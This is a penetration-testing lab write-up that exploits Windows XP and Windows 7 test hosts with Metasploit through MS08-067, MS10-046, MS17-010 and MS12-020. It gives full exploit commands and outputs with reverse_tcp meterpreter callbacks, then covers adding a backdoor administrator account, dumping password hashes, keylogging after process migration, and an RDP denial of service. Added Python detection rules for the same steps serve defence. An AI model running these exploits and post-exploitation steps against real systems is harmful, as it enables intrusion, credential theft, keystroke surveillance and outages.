Common Windows vulnerability attack lab: MS08-067, MS10-046, MS17-010, MS12-020
This write-up uses MSF (Metasploit Framework) against a Windows 7 target and a Windows XP target to verify attacks for four common Microsoft vulnerabilities: MS08-067, MS10-046, MS17-010 and MS12-020.
0. Lab environment
Subnet: 192.168.155.0/24
NIC mode: NAT
Attacker 1 (Kali) IP: 192.168.155.2
Attacker 2 (mac) IP: 192.168.155.1
Target 1 (Windows XP SP3, English) IP: 192.168.155.18
Target 2 (Windows 7) IP: 192.168.155.19
1. MS08-067 [RPC]
1.1 Vulnerability description
Microsoft Windows Server service RPC request buffer overflow. The Windows Server service has a buffer overflow in its handling of specially crafted RPC requests; a remote attacker can trigger it by sending a malicious RPC request, fully compromise the system and execute arbitrary code with SYSTEM privileges. On Windows 2000, XP and Server 2003 the vulnerability can be exploited without authentication; on Windows Vista and Server 2008 authentication may be required.
1.2 Host discovery
nmap -F 192.168.155.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-03 03:50 EDT
Nmap scan report for 192.168.155.1
Host is up (0.00084s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
53/tcp open domain
5000/tcp open upnp
49152/tcp open unknown
MAC Address: FA:FF:C2:C2:93:64 (Unknown)
Nmap scan report for 192.168.155.18
Host is up (0.0018s latency).
Not shown: 93 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)
Nmap scan report for 192.168.155.2
Host is up (0.0000060s latency).
All 100 scanned ports on 192.168.155.2 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds
Target host IP: 192.168.155.18
Open ports:
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)
Target port: 445
Service: microsoft-ds
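Before looking at individual exploits, a defender wants the same scan turned into an exposure inventory: which hosts expose the services the four advisories in this lab depend on (SMB on 139/445 for MS08-067 and MS17-010, RDP on 3389 for MS12-020). The following parser is an added example, not part of the original write-up; it runs over a constructed copy of the nmap normal output shown above and flags hosts with those ports open.

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt of `nmap -F` normal output, modelled on the scan above.
NMAP_OUTPUT = """\
Nmap scan report for 192.168.155.1
Host is up (0.00084s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
53/tcp open domain
5000/tcp open upnp
49152/tcp open unknown
MAC Address: FA:FF:C2:C2:93:64 (Unknown)
Nmap scan report for 192.168.155.18
Host is up (0.0018s latency).
Not shown: 93 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)
Nmap scan report for 192.168.155.2
Host is up (0.0000060s latency).
All 100 scanned ports on 192.168.155.2 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds
"""

# Services whose exposure the advisories in this lab depend on.
WATCHED_PORTS = {
    139: "NetBIOS session (MS08-067)",
    445: "SMB (MS08-067, MS17-010)",
    3389: "RDP (MS12-020)",
}

_HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
_PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")


def parse_nmap(text: str) -> Dict[str, List[Tuple[int, str, str]]]:
    """Map each host in nmap normal output to its (port, state, service) lines."""
    hosts: Dict[str, List[Tuple[int, str, str]]] = {}
    current = None
    for line in text.splitlines():
        m = _HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = _PORT_RE.match(line)
        if m and current is not None:
            hosts[current].append((int(m.group(1)), m.group(3), m.group(4)))
    return hosts


def exposed_hosts(hosts: Dict[str, List[Tuple[int, str, str]]]) -> Dict[str, List[str]]:
    """Return only hosts with an open watched port, with a note on why it matters."""
    findings: Dict[str, List[str]] = {}
    for host, ports in hosts.items():
        hits = [f"{port}/tcp {WATCHED_PORTS[port]}"
                for port, state, _ in ports if state == "open" and port in WATCHED_PORTS]
        if hits:
            findings[host] = hits
    return findings


if __name__ == "__main__":
    for host, hits in exposed_hosts(parse_nmap(NMAP_OUTPUT)).items():
        print(host, "->", "; ".join(hits))
```

On the sample above only 192.168.155.18 is reported, for 139 and 445; the Windows 7 host was not up during this scan, which is why no 3389 finding appears.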
1.3 Exploiting the target through MS08-067 with MSF
msfconsole
search ms08-067
msf6 > use exploit/windows/smb/ms08_067_netapi
show targets
set target 0
set RHOSTS 192.168.155.18
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
[*] Started reverse TCP handler on 192.168.155.2:4444
[*] 192.168.155.18:445 - Automatically detecting the target...
[*] 192.168.155.18:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.155.18:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.155.18:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.155.18
[*] Meterpreter session 1 opened (192.168.155.2:4444 -> 192.168.155.18:1074) at 2022-05-03 04:42:05 -0400
1.4 Post-exploitation
1. Check privileges:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We have SYSTEM privileges.
2. Shell
meterpreter > shell
Process 3980 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
We now have a shell on the target system.
3. Add an account
C:\WINDOWS\system32>net user sxk 123.com /add
net user sxk 123.com /add
The command completed successfully.
4. Add the new account to the Administrators group
C:\WINDOWS\system32>net localgroup administrators sxk /add
net localgroup administrators sxk /add
The command completed successfully.
The user has been added to the target's Administrators group.
5. Screenshot
meterpreter > screenshot
Screenshot saved to: /root/Desktop/YhioHCHD.jpeg
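The account steps above leave a clear trail in the Windows Security log: a 4720 (user account created) followed within seconds by a 4732 (member added to a security-enabled local group), both with NT AUTHORITY\SYSTEM as the subject. The detection rule below is an added example, not part of the original write-up; it runs over constructed event records shaped like those two steps, plus a constructed benign onboarding for contrast, and the 10-minute window and "SYSTEM subject means high severity" heuristic are assumptions chosen for the example.

```python
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed Windows Security log records, reduced to the fields the rule needs.
# The first two are shaped like what `net user sxk ... /add` and
# `net localgroup administrators sxk /add` would log on the target
# (4720 = user account created, 4732 = member added to a security-enabled local group);
# the last two are a constructed benign helpdesk onboarding for contrast.
EVENTS = [
    {"time": "2022-05-03T04:43:10", "id": 4720, "subject": "NT AUTHORITY\\SYSTEM", "target": "sxk", "group": None},
    {"time": "2022-05-03T04:43:41", "id": 4732, "subject": "NT AUTHORITY\\SYSTEM", "target": "sxk", "group": "Administrators"},
    {"time": "2022-05-03T09:15:00", "id": 4720, "subject": "WINXP\\helpdesk", "target": "newhire", "group": None},
    {"time": "2022-05-04T09:15:00", "id": 4732, "subject": "WINXP\\helpdesk", "target": "newhire", "group": "Administrators"},
]

PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users", "Backup Operators"}


def find_fast_admin_creation(events: List[Dict],
                             window: timedelta = timedelta(minutes=10)) -> List[Tuple[str, str, int, str]]:
    """Correlate a 4720 with a later 4732 into a privileged group for the same account.

    Returns (account, subject, seconds_between, severity). Severity is 'high' when the
    subject is the SYSTEM account: interactive administrators create accounts under their
    own identity, so SYSTEM doing it points at a compromised service (heuristic, assumed).
    """
    created: Dict[str, Tuple[datetime, str]] = {}
    alerts: List[Tuple[str, str, int, str]] = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 4720:
            created[e["target"]] = (t, e["subject"])
        elif e["id"] == 4732 and e["group"] in PRIVILEGED_GROUPS and e["target"] in created:
            t0, _ = created[e["target"]]
            if t - t0 <= window:
                severity = "high" if e["subject"].upper().endswith("\\SYSTEM") else "medium"
                alerts.append((e["target"], e["subject"], int((t - t0).total_seconds()), severity))
    return alerts


if __name__ == "__main__":
    for account, subject, secs, sev in find_fast_admin_creation(EVENTS):
        print(f"[{sev}] {account} created and made privileged by {subject} within {secs}s")
```

The benign onboarding is not reported because the group change happens a day after the account creation; tune the window to what your helpdesk process actually looks like before deploying a rule like this.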
2. MS10-046 [shortcut automatic code execution]
2.1 Vulnerability description
Microsoft Windows shortcut (LNK file) automatic code execution vulnerability.
Windows supports shortcuts, also called LNK files. An LNK file is a reference to a local file; opening it has the same effect as opening the target the shortcut points to. Windows does not handle LNK files correctly: a specially crafted LNK file can make Windows automatically execute the code the shortcut refers to. That code can live on a USB drive, a local or remote file system, an optical disc or elsewhere, and simply viewing the folder that contains the LNK file in Explorer is enough to trigger the vulnerability.
Affected systems include Windows XP SP3/SP2, Vista SP2/SP1, Server 2008 R2/SP2 and Windows 7.
2.2 Exploitation
search ms10-046
exploit/windows/browser/ms10_046_shortcut_icon_dllloader
exploit/windows/smb/ms10_046_shortcut_icon_dllloader
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.155.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
set SRVHOST 192.168.155.2   (note: this is the IP of the attacker, i.e. Kali)
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.155.2 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.155.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
exploit
On the victim XP host, browse to the Kali attacker's IP:
http://192.168.155.2:80/
A folder opens containing a .dll file and a shortcut. Double-click the shortcut, then switch back to Kali to observe the result.
MSF reports that it has gained control of a machine; enter sessions 1 to drop into the target's meterpreter session. The vulnerability has been reproduced.
sessions 1
2.3 Post-exploitation
See MS08-067.
3. MS17-010 [SMB]
3.1 Vulnerability description
Microsoft Windows SMB Server remote code execution vulnerability.
The Microsoft Server Message Block 1.0 (SMBv1) server has a remote code execution flaw in its handling of certain requests; successful exploitation lets an attacker execute arbitrary code on the target server. A failed attempt causes a denial of service, which is itself a risk to the business.
Affected systems: Microsoft Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2, Windows Server 2008, Windows RT 8.1 and others.
3.2 Exploitation
3.2.1 Target discovery
search ms17-010
The auxiliary module auxiliary/scanner/smb/smb_ms17_010 can find targets that have this vulnerability.
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.155.18 192.168.155.19 192.168.155.0
The scan shows that 192.168.155.19, target 2 (Windows 7), may be vulnerable to MS17-010.
back
Leave the current module.
3.2.2 Exploitation
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.155.19
set LHOST 192.168.155.1
run
SYSTEM privileges obtained.
3.3 Post-exploitation
3.3.1 Take a screenshot
meterpreter > screenshot
Screenshot saved to: /Users/xiaokaisi/MYSHXRuM.jpeg
3.3.2 Upload a file
meterpreter > upload /Users/xiaokaisi/MYSHXRuM.jpeg
[*] uploading : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] Uploaded 260.89 KiB of 260.89 KiB (100.0%): /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] uploaded : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
pwd
C:\Windows\system32
The file was uploaded to the target system's C: drive.
3.3.3 Download a file
meterpreter > download drivers/etc/hosts
[*] Downloading: drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] Downloaded 854.00 B of 854.00 B (100.0%): drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] download : drivers/etc/hosts -> /Users/xiaokaisi/hosts
The target system's hosts file was downloaded.
3.3.4 Enter a shell
meterpreter > shell
Process 6872 created.
Channel 3 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>
3.3.5 Dump password hashes
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Hashes to crack:
259745cb123a52aa2e693aaacca2db52
31d6cfe0d16ae931b73c59d7e0c089c0
3.3.6 Webcam
meterpreter > webcam_list   (list webcams)
[-] No webcams were found
meterpreter > webcam_snap   (take a photo with the webcam)
[-] Target does not have a webcam
meterpreter > webcam_stream   (stream video from the webcam)
[-] Target does not have a webcam
3.3.7 Keystroke capture
To record the keystrokes of a particular user on the target, for example Administrator, migrate into one of that user's processes; from a SYSTEM-context process you cannot capture Administrator's keystrokes.
After keyscan_start begins capturing, use keyscan_dump to export what has been recorded, and only run keyscan_stop once you no longer want to capture. Do not run keyscan_stop before keyscan_dump.
Use ps to find a suitable process to migrate into:
meterpreter > ps
3668 3608 explorer.exe   (commonly used process)
meterpreter > migrate 3668
[*] Migrating from 1048 to 3668...
[*] Migration completed successfully.
meterpreter > getuid
Server username: client-PC\client
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
wo shi client ,<Shift>Ilove china<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
The target user's keystrokes were captured: "wo shi client ,Ilove china".
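The migrate step above is what makes the keystroke capture possible, and it is also the most detectable part of it: moving from PID 1048 into explorer.exe means a SYSTEM process creates a thread inside the logged-on user's process, which Sysmon records as Event ID 8 (CreateRemoteThread). The rule below is an added example, not part of the original write-up. It runs over constructed Sysmon records; the PIDs 1048 and 3668 mirror the migrate output above, while the image names, the source allowlist and the "interactive target" list are assumptions made for the example.

```python
from typing import Dict, List

# Constructed Sysmon Event ID 8 (CreateRemoteThread) records, reduced to the fields the
# rule needs. PIDs mirror the migrate output above; image names are assumptions.
SYSMON_EVENTS: List[Dict] = [
    {"EventID": 8, "UtcTime": "2022-05-03 05:01:12.301",
     "SourceImage": r"C:\Windows\System32\spoolsv.exe", "SourceProcessId": 1048,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 3668,
     "StartAddress": "0x0000000000310000", "StartModule": "", "StartFunction": ""},
    {"EventID": 8, "UtcTime": "2022-05-03 05:01:15.002",
     "SourceImage": r"C:\Windows\System32\csrss.exe", "SourceProcessId": 392,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 3668,
     "StartAddress": "0x0000000077A43A10", "StartModule": r"C:\Windows\System32\ntdll.dll",
     "StartFunction": "RtlUserThreadStart"},
    {"EventID": 1, "UtcTime": "2022-05-03 05:01:20.000", "Image": r"C:\Windows\System32\cmd.exe"},
]

# Sources that legitimately start threads in other processes on a baseline Windows host
# (site-specific assumption: add your EDR/AV agents only after verifying their behaviour).
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
# Interactive processes that are attractive migration targets because they run as the
# logged-on user (the getuid change from SYSTEM to client-PC\client above).
INTERACTIVE_TARGETS = {"explorer.exe", "iexplore.exe", "firefox.exe", "chrome.exe"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def detect_remote_threads(events: List[Dict]) -> List[Dict]:
    """Flag Event ID 8 records that look like code injection rather than OS housekeeping."""
    alerts: List[Dict] = []
    for e in events:
        if e.get("EventID") != 8:
            continue
        reasons = []
        if (e["SourceImage"].lower() not in ALLOWED_SOURCES
                and _basename(e["TargetImage"]) in INTERACTIVE_TARGETS):
            reasons.append("remote thread into an interactive process from an unexpected source")
        if not e.get("StartModule"):
            # Sysmon leaves StartModule blank when the thread starts outside any loaded
            # module, i.e. in memory that was written into the target at runtime.
            reasons.append("thread start address is not inside any loaded module")
        if reasons:
            alerts.append({"time": e["UtcTime"],
                           "source_pid": e["SourceProcessId"], "source": e["SourceImage"],
                           "target_pid": e["TargetProcessId"], "target": e["TargetImage"],
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_threads(SYSMON_EVENTS):
        print(f"{alert['time']} {alert['source']} ({alert['source_pid']}) -> "
              f"{alert['target']} ({alert['target_pid']}): {'; '.join(alert['reasons'])}")
```

The csrss.exe record is deliberately included: it creates threads in explorer.exe as part of normal session management and has a module-backed start address, so a rule that only matched on "thread into explorer.exe" would be noisy without the allowlist and the StartModule check.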
4. MS12-020 [RDP]
4.1 Vulnerability description
Remote Desktop Protocol has a serious vulnerability: an intruder who sends a sequence of specially crafted RDP packets to the default Remote Desktop port (3389) can gain full administrative privileges and compromise the system. Any host with Remote Desktop enabled on the default port 3389 is a potential target.
In addition, RDP is a multi-channel protocol, and the flaw can be used for DoS attacks.
According to Microsoft's security bulletin, the whole Windows family (XP/Vista/7/2000/2003/2008) is affected.
4.2 Target discovery
search ms12-020
- auxiliary/scanner/rdp/ms12_020_check
- auxiliary/dos/windows/rdp/ms12_020_maxchannelids
use auxiliary/scanner/rdp/ms12_020_check
Use the auxiliary scanner module for target discovery.
set RHOSTS 192.168.155.0/24
set THREADS 20
run
The scan shows that 192.168.155.19, the Windows 7 host, is a possible target.
4.3 Exploitation
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3389 yes The target port (TCP)
set RHOSTS 192.168.155.19
run
[*] Running module against 192.168.155.19
[*] 192.168.155.19:3389 - 192.168.155.19:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.155.19:3389 - 192.168.155.19:3389 - 210 bytes sent
[*] 192.168.155.19:3389 - 192.168.155.19:3389 - Checking RDP status...
[+] 192.168.155.19:3389 - 192.168.155.19:3389 seems down
[*] Auxiliary module execution completed
The target host blue-screened and was forced offline to reboot; the DoS attack succeeded.